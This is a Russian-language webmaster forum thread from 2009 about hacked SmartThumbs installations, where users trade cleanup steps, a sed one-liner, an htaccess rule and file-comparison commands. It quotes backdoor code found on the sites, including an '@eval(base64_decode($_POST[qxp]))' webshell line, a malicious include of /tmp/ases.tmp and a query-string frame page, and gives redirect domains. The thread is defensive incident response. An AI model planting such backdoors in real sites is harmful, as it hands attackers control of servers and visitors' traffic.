SmartThumbs HACKED again

кратко:
заломаны сайты со смарттамбсом последних версий, трафик с уникальных айпи уходит по кликам на галеры через редиректные скрипты хуйзнает куда.

предварительное лечение:

settings-->users-> удаляем пустых юзеров
tools-->file check-> находим и удаляем лишние файлы (высвечены красным) - если у вас много архивных страниц - смотрите внимательно, там может быть всего один файл в директории
/thumbs/015/skfjdlkjfk.php - примерное название
/classes/sniffer_class.php
../gallery.php (вообще это родной файл, но ст на него ругается, возможно, файл изменен и отличается от оригинального)
../go.php - такое тоже может быть

смотрим файл
/st/admin/variables.php

в конце стоит
<?@include_once('/tmp/ases.tmp');?>

удаляем строчку вместе с содержимым директории /tmp/ (кроме конкретно нужных вещей, конечно)

ATX 1.3 - есть версия, что дырка может быть и там, но имхо это просто совпадение. Но. там тоже есть
Extra-->file check
внесите ваш айпишник в список доступа, это понижает шансы взлома.

далее детали и обсуждение
http://www.askdamagex.com/f2/smart-thumbs-new-hack-40055/

Последний раз редактировалось: fihorn (08/10/09 в 00:33), всего редактировалось 1 раз

спасибо, думаю что проблема в СТ так как у меня несколько копий и только одна обновлена до 5.75 и только в ней я нашел несколько дней подоозрительный фал (чисто случайно лазил в СТ и нажал чек файлы) типа такого /thumbs/015/skfjdlkjfk.php - примерное название удалил,
/classes/sniffer_class.php вот это тоже удалять? (я удалил)

world-gay-sex писал:

/classes/sniffer_class.php вот это тоже удалять? (я удалил)

я тоже удалил, т.к. его не должно быть

народ не чешется вообще, я погляжу..
в треп что ли запостить..

на 2 х сиджах нашол пустых юзеров... других файлов нет..

обновил первый пост

Последний раз редактировалось: fihorn (08/10/09 в 00:35), всего редактировалось 1 раз

спасибо

А известно ли, allow/deny в htaccess админки в данном случае спасаёт, или хак делается мимо админки?

ТС, у тебя в .htpasswd файле были записи по тем юзерам, которых ты удалил через панель ST?

это важно

DG писал:

А известно ли, allow/deny в htaccess админки в данном случае спасаёт, или хак делается мимо админки?

ну там ведь админка как сделана.. если закрыть всю директорию ST под пароль - то обычные серферы будут получать запрос логина с паролем при клике на тумбу =)

а если конкретные файлы блокировать - возможно, может помочь, только я не знаю какие.

конкретно вот есть решение на закрытие ПОСТ-запросов на определенные файлы.
http://www.askdamagex.com/f2/smart-thumbs-new-hack-40055/index5.html#post384569

Soft-Com писал:

ТС, у тебя в .htpasswd файле были записи по тем юзерам, которых ты удалил через панель ST? это важно

вообще лично я сначала удалил, а уже потом посмотрел хтпассвд
но на аскдамаге писали, что таки да

там строчки выглядели примерно так

:3948asdf98df8(md5 hash here)
admin:fsfsdlfksldfk(md5 hash here)
admin2:dfasdfh98f(md5 hash here)

типа такого

люди, огромная просьба, кто нашол у себя такую херь - не удаляйте файлы из /thumbs/ директории, напишите плс мне в личку, а лучше в аську.

нужно для выяснения кода самого скрипта

пока еще не разобрался, но после взлома на сервере присутвуют 2 части скрипта:
1. в /tmp/ - судя по всему скрипт редиректа посетителя на урл http://itrxx.com/fr.php

Код:

for i in `locate st/admin/variables.php`; do grep -H ases $i; if [ $? = 0 ]; then echo "found in $i"; sed -i 's/<?@include_once.*;?>//g' $i; fi; done

2. в контенте доменов - в нём закодированная сторка, которая и представляет собой код, судя по всему пхп-шелл.

для поиска 2й части скрипта рекомендую использовать такую конструкцию:

Код:

wget http://soft-com.biz/st_bd.txt -O /tmp/st_bd.php cd DIR_WHERE_TO_SCAN find ./ -name \*.php -exec diff -qs /tmp/st_bd.php {} \; | grep identical | awk '{print $4}'

в результате будет список файлов со скриптами, просьба их не удалять, напишите плс в аську.

http://soft-com.biz/st_bd.txt - код скрипта, проверенео - он везде одинаковый, выложил у себя для удобства.

Последний раз редактировалось: Soft-Com (08/10/09 в 04:08), всего редактировалось 1 раз

вот здесь вот уже кто-то сделал дезенд скрипту
http://www.askdamagex.com/f2/smart-thumbs-new-hack-40055/index4.html#post384528

там присутствует еще один домен
atrxx.com/fr.php

по поводу хтаксесса и возможной защиты - в директории /st/ создаете .htaccess
там пишете

<FilesMatch "^((st|flush)\.php)$">
<Limit POST>
order deny,allow
deny from all
</Limit>
</FilesMatch>

это запрещает все POST-запросы на пхп-шные файлы внутри этой директории.
я пробовал рецепт из ссылки выше, с более длинным хтаксессом - но он не заработал, потому что стили тоже стали блокироваться

и, по всей видимости, действительно необходимо делать поиск идентичных по размеру файлов, потому что скрипты могут быть так же замаскированы под гиф-жпеги.

так что грепом надо искать все файлы, а не только пхп..

дезенд до одного места без куки, я там же об этом написал

по поводу такого хтаксеса - при синке тумб при использовании удалённого тумбового сервера часть функций работать не будет по определению.

а если посмотреть код самого flush.php то думаю еще дофига чего работать перестанет даже в самой админке смарта

Soft-Com писал:

по поводу такого хтаксеса - при синке тумб при использовании удалённого тумбового сервера часть функций работать не будет по определению. а если посмотреть код самого flush.php то думаю еще дофига чего работать перестанет даже в самой админке смарта

очень своевременный комментарий, я уже понаставил хтаксессов..
а что делает файл flush.php?

много чего, от редактирования .htpasswd и добавления пользователя до работы с галерами

на двух ст удалил пустых юзереи... болше ничего подозрителного вроде нет.

Имею следующие симптомы на двух объединенных доменах:

domain#1.com - версия СТ 5.71
domaing#2.com - версия СТ 5.71

domaing#2.com является чайлдом для домена domain#1.com
Итак:

domain#1.com - есть пустой юзер и моя запись, в файле .htpasswd - так же присутствует моя запись и запись без юзернейма.
domain#2.com - _только_ пустой юзер в файле .htpasswd тоже только запись без юзернейма

показания "file check" (отбросив мои файлы) domain#1.com:
classes/php_class.php - unknown file
gallery.php - unknown file

оба файла с открытым кодом, не зазенденые. php_class.php - просто какой-то большой класс функций, причем с русскими комментариями. Откуда он там - хз. Содержание gallery.php:

Код:

<? $g = getenv ("QUERY_STRING"); ?> <html> <head> <title></title> <!-- frames --> <frameset  rows="100,*">     <frame name="" src="top.html" marginwidth="10" marginheight="10" scrolling="auto" frameborder="0">     <frame name="" src="<?php echo $g; ?>" marginwidth="10" marginheight="10" scrolling="auto" frameborder="0"> </frameset> </head> </body> </html>

а вот для домена domain#2.com (дочернего) список больше:
admin/autocrop.php - checksum does not match
admin/check.php - checksum does not match
admin/cron.php - checksum does not match
admin/edit_picture.php - checksum does not match
admin/edit_spot.php - checksum does not match
admin/rotator.php - checksum does not match
admin/services.php - checksum does not match
admin/sync.php - checksum does not match
admin/thumbscan.php - checksum does not match
admin/traffic_check.php - checksum does not match
admin/win_edit.php - checksum does not match
classes/antibot_class.php - checksum does not match
classes/CropImage.php - checksum does not match
classes/functions.php - checksum does not match
classes/htaccess_class.php - checksum does not match
classes/mail_class.php - checksum does not match
classes/mysql_class.php - checksum does not match
classes/rotator_class.php - checksum does not match
classes/scan_class.php - checksum does not match
submit/antibot.php - checksum does not match
submit/index.php - checksum does not match
admin/update/available_version.php - unknown file
admin/autocrop.php - unknown file
admin/check.php - unknown file
admin/cron.php - unknown file
admin/edit_picture.php - unknown file
admin/edit_spot.php - unknown file
admin/rotator.php - unknown file
admin/services.php - unknown file
admin/sync.php - unknown file
admin/thumbscan.php - unknown file
admin/traffic_check.php - unknown file
admin/win_edit.php - unknown file
classes/mysql.php - unknown file
classes/antibot_class.php - unknown file
classes/CropImage.php - unknown file
classes/functions.php - unknown file
classes/htaccess_class.php - unknown file
classes/mail_class.php - unknown file
classes/mysql_class.php - unknown file
classes/rotator_class.php - unknown file
classes/scan_class.php - unknown file
templates/index.php - unknown file
templates/archive.php - unknown file
templates/install.php - unknown file
submit/antibot.php - unknown file
submit/index.php - unknown file
gallery.php - unknown file
flush.php - unknown file

может это глюк проверки файлов для дочернего домена? т.к.
templates/index.php - это мой темплейт просто
но вот что такое: templates/install.php ??? не помню чтобы я такое туда клал. Файл зазенден.

Далее для обоих доменов присутствует в конце файла variables.php строка:

<?@include_once('/tmp/ases.tmp');?>
в директории /tmp/ (уже на самом сервере, т.е. не в папке /home/), так же присутствует ases.tmp - зазендин.

Вобщем как я понимаю, меня тоже поломали? Вопрос, что делать? :-) Ну не удалять же все файлы с domaing#2.com....
Пока ничего не трогал. Могу что-ниубдь "затестить".

ЗЫ: Кстати, есть еще два независимых домена на этом же сервере с версиями СТ 5.70 и 5.66 - на них симптомов не обнаружено.

variables.php содержит еще строчку @eval(base64_decode($_POST[qxp]));//';
php_class.php это походу ПХП шелл

дайте файлы плс посмотреть

как я написал на askdamagex, часть которая инклюдится из variables.php - это код инклюда трояна, в зависмости от условий разный; всё что внутри директории ST - вебшелл.

но на русском вебшелла я еще не видел. (касаемо этого конкретного случая)

http://www.megaupload.com/?d=L82E1IGV

спасибо, только логи бы к нему

Вообще какое-то слабое обсуждение, честно говоря. Неужели тема мало кого интересует?..

X-dream писал:

на двух ст удалил пустых юзереи... болше ничего подозрителного вроде нет.

посмотри admin/variables.php

tools->file check